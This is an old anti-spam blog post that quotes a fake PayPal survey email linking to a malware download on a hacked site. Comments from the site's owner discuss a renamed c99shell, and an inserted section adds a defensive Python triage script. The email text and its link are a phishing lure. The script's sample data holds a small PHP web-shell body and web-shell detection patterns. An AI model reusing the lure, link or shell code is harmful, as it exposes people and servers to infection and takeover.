Your PayPal Account Survey ID: XWKLJBXLGP – Yep The Old Virus Download Trick


Posted by Mr Spamalicious | Posted in Computer Virus Spam - Open the Attachment or Follow a Link to Get Infected by a Trojan | Posted on 05-27-2010

This has got to be the laziest attempt to trick me into installing a virus I’ve ever seen. They put the word “PayPal” in quotes and brackets with stray punctuation (presumably to slip past keyword filters), they make no attempt to make the message look like it’s from PayPal, and they don’t even disguise the link that’s going to try to install the virus. Lazy, lazy, lazy.

From: yzuvqs@accounts.net
Reply To: yzuvqs@accounts.net
To: UserAccountSurvey2010@orange.fr
Dear Customer, 

CONGRATULATIONS !!!

You have been chosen by |"_Pay`Pal_"| Online department to take part in our quick
and easy 5 question survey.
In return we will credit $100 to your account - Just for your time!

Helping us better understand how our customers feel benefits everyone.
With the information collected we can decide to direct a number of changes
to improve and expand our online service.
The information you provide us is all non-sensitive and anonymous -
No part of it is handed down to any third party groups.
It will be stored in our secure database for maximum of 3 days while
we process the results of this nationwide survey.

We kindly ask you to spare two minutes of your time in
taking part with this unique offer!

To Continue click on the link below: http://www.gamer-universe.net/update-au/index.php

Copyright © 1999-2010 |"_Pay`Pal_"|. All rights reserved

ID:

COXCKRMWSNVQVLDBRRXJJQFRXEJBORFJGOZCXS

Comments (8)

I’m shocked at what has happened. That is my website that had been hacked. Unfortunately, I have yet to discover the root of the problem. :(


Look at the code in the index page. I bet there’s a bunch of code in the header that is designed to execute some malicious process. Delete it and then change your passwords on your FTP and cPanel accounts.

Glad you’re doing something about it. This website (asasteelstructures.co.uk) was hacked in March and a spammer is using it to deliver malicious payloads. I emailed the company about the problem and it’s now almost June and they still haven’t fixed it. I wrote about it here: http://www.spamdiary.com/2010/03/asa-steel-structures-ltd-looking-for-mules-uh-i-mean-sales-representives/.

What dummies.


I’ve scanned my apache and ftp logs, but I’m unable to locate the reason the files are even being re-created. I’ve deleted the update-au many times already. I’ve also sealed away my up-to-date wordpress blog, yet the attack persists. I might just end up re-doing the whole system. I haven’t even found any vulnerable files yet, sadly.


Holy cow. That really sucks. Clearly the work of one of the more sophisticated hackers. I feel your pain. One good thing is that I haven’t seen a spike in visitors searching for the email in question, so hopefully it’s not widespread yet. When a piece of spam is widespread and I post it, I get a huge spike in traffic from people searching for information. Right now the iTunes $50 gift certificate virus scam is off the charts again.


The sneaky bastard renamed their c99shell file so that it was -almost- identical to one of my other files. The strange thing is that there has to be a back-up file somewhere if it had the name it did. It’s not a filename visible to the public. It really sucks when you have a website dedicated to the public, not for profit, and you get hacked.

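The two comments above describe the state of the compromised host: a c99shell file renamed to look like a legitimate neighbour, and Apache and FTP logs that did not show what keeps re-creating the update-au directory. As an added example (not code from Spam Diary or from the commenter), here is a Python script that runs the three checks a responder would do first, over constructed sample data: flag PHP files carrying common web-shell indicators, list near-duplicate file names within one directory (how a renamed shell shows up next to the file it imitates), and pull from a combined-format access log every request that hit a flagged file, so the operator's IP and the timing fall out. The web-root contents, file names, IP addresses, log lines and the indicator list are all constructed assumptions for illustration.

```python
"""Triage helpers for a PHP site hosting a renamed web shell.

Added example, not code from Spam Diary or the commenter. All data here
(web-root contents, file names, IPs, log lines) is constructed; the
indicator list is an assumption and is deliberately short.
"""
import re

# Strings that show up in many PHP web shells, c99shell included.
WEBSHELL_INDICATORS = [
    ("c99shell banner", re.compile(r"c99sh", re.I)),
    ("obfuscated eval", re.compile(r"eval\s*\(\s*(base64_decode|gzinflate|str_rot13)\s*\(", re.I)),
    ("command from request", re.compile(r"\b(system|passthru|shell_exec|exec|popen)\s*\(\s*\$_(GET|POST|REQUEST)", re.I)),
    ("upload handler", re.compile(r"move_uploaded_file\s*\(", re.I)),
]

# Constructed web root, path -> file body. class-wp-http.php stands in for a
# real WordPress file; class-wp-htpp.php is the shell renamed to resemble it.
SAMPLE_WEBROOT = {
    "index.php": "<?php require 'wp-blog-header.php';",
    "wp-includes/class-wp-http.php":
        "<?php class WP_Http { function request($url) { return wp_remote_get($url); } }",
    "wp-includes/class-wp-htpp.php":
        "<?php /* c99shell v1.0 */ eval(base64_decode($_POST['c'])); "
        "if (isset($_GET['cmd'])) system($_GET['cmd']);",
    "update-au/index.php": "<?php header('Location: http://example.invalid/setup.exe');",
}

# Constructed Apache combined-format lines: 203.0.113.7 drives the shell,
# the 198.51.100.x clients are spam recipients who followed the link.
SAMPLE_ACCESS_LOG = """\
203.0.113.7 - - [27/May/2010:06:58:41 +0000] "POST /wp-includes/class-wp-htpp.php HTTP/1.1" 200 512 "-" "Mozilla/4.0"
198.51.100.22 - - [27/May/2010:07:02:13 +0000] "GET /update-au/index.php HTTP/1.1" 302 231 "-" "Mozilla/5.0"
198.51.100.23 - - [27/May/2010:07:02:15 +0000] "GET /index.php HTTP/1.1" 200 8920 "-" "Mozilla/5.0"
203.0.113.7 - - [27/May/2010:07:15:02 +0000] "POST /wp-includes/class-wp-htpp.php?cmd=ls HTTP/1.1" 200 1024 "-" "Mozilla/4.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def find_webshells(webroot):
    """Return {path: [indicator names]} for every file that trips an indicator."""
    hits = {}
    for path, body in webroot.items():
        matched = [name for name, rx in WEBSHELL_INDICATORS if rx.search(body)]
        if matched:
            hits[path] = matched
    return hits


def _edit_distance(a, b):
    """Plain Levenshtein distance, inlined to keep the script dependency-free."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def find_lookalike_names(paths, max_distance=2):
    """Pairs of files in the same directory whose names differ by a few edits."""
    by_dir = {}
    for p in paths:
        d, _, name = p.rpartition("/")
        by_dir.setdefault(d, []).append(name)
    pairs = []
    for d, names in by_dir.items():
        names = sorted(names)
        prefix = d + "/" if d else ""
        for i in range(len(names)):
            for j in range(i + 1, len(names)):
                if 0 < _edit_distance(names[i], names[j]) <= max_distance:
                    pairs.append((prefix + names[i], prefix + names[j]))
    return pairs


def shell_requests(log_text, shell_paths):
    """(ip, timestamp, method, path) for requests to a flagged file, in log order."""
    out = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m.group("path").split("?", 1)[0].lstrip("/")  # drop query string
        if path in shell_paths:
            out.append((m.group("ip"), m.group("time"), m.group("method"), path))
    return out


if __name__ == "__main__":
    shells = find_webshells(SAMPLE_WEBROOT)
    for path, names in shells.items():
        print(f"shell candidate: {path}  [{', '.join(names)}]")
    for a, b in find_lookalike_names(SAMPLE_WEBROOT):
        print(f"lookalike names: {a}  ~  {b}")
    for ip, ts, method, path in shell_requests(SAMPLE_ACCESS_LOG, shells):
        print(f"{ts}  {ip}  {method} /{path}")
```

To use it on a real host, replace SAMPLE_WEBROOT with a walk of the document root and SAMPLE_ACCESS_LOG with the actual access log; an indicator match is a prompt to read the file, not a verdict. In the constructed log the first POST to the shell comes before the 07:02 start of the spam run, and that ordering is the point: the shell (and whatever credential or bug planted it) is what has to go, not just the update-au directory it keeps re-creating.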

So I’m curious. How did you discover the hack? Obviously you visited this site at some point. Google indexes my pages instantaneously, so whenever I make a new post it immediately ranks for its keywords. I assume you discovered it first, then went searching and found Spam Diary.


I was given an email from SpamCop that my server was being used as a spambot. I searched my website’s address to see how public it’s become, and I found this site. The spam attack began 7:02AM this morning. I still have yet to find out the origin, so I’m pretty much set on a wipe. This sucks.


Bummer. I assume you have some database backups to reinstall all your posts. If not Google has a lot of your pages cached and you could cut and paste the content and rebuild a lot of the content that way. I had to do it for one of my blogs a while back and it worked perfectly. Good luck.

